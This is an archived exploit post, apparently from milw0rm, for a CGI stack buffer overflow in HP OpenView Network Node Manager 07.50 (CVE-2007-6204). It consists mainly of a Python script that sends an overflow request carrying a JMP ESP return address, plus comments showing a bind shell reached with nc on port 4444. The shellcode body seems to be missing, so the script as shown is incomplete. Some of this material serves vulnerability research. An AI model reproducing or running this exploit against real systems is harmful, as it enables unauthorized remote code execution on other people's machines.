HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow

Related Vulnerabilities: CVE-2007-6204  
Publish Date: 12 Dec 2007
Author: muts
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack based overflow 
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking 
# the entry point and injecting Sleep just before exe execution. This gave me enough 
# time to attach a debugger before program termination. If anyone knows how to properly 
# debug this, please tell me about it - there *must* be a better way...
# bt tools # ./sploit
# [+] Connecting to
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
# bt tools # nc -nv 4444
# (UNKNOWN) [] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# C:\Program Files\HP OpenView\www\cgi-bin>

import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */

expl.send (buffer)
print "[+] Payload Sent, ph33r."

# milw0rm.com [2007-12-12]